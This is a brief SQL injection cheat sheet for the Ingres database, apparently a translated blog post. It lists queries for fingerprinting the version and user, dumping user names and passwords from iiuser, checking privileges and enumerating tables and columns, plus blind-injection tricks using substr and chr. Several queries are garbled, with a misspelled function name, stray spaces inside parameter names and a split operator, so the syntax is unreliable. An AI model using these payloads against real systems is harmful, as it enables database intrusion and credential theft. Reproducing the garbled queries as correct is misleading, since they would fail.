Ingres is an open source database that can be used on all mainstream operating systems. In databases integrated with Web applications, Ingres is one of the less popular databases.
Here I want to introduce the SQL injection METHOD OF THE Ingres Database.
Query version: select dbsminfo ('_ version ');
Query the current user: select dbsminfo ('System _ user ');
Select dbsminfo ('session _ user ')
List users: select name, password from iiuser;
List User Permissions:
Select dbsminfo ('select _ syscat ');
Select dbsminfo ('db _ privileges ');
Select dbsminfo ('db _ admin ');
Select dbsminfo ('security _ priv ');
Select dbsminfo ('create _ table ');
Select dbsminfo ('create _ procedure ');
Extract the current user database:
Select dbmsinfo ('database ');
List tables:
Select relid, relowner, relloc from iirelation where relowner! = '$ Ingres ';
Fields listed:
Select column_name, column_datatype, table_name, table_owner from iicolumns;
Ingres Database SQL blind Injection
String length: length ()
Extract substrings from a given string: select substr (string, offset, length );
String ('abc') without single quotes: select chr (65) | chr (66) | chr (67)
From hi.baidu.com/evilrapper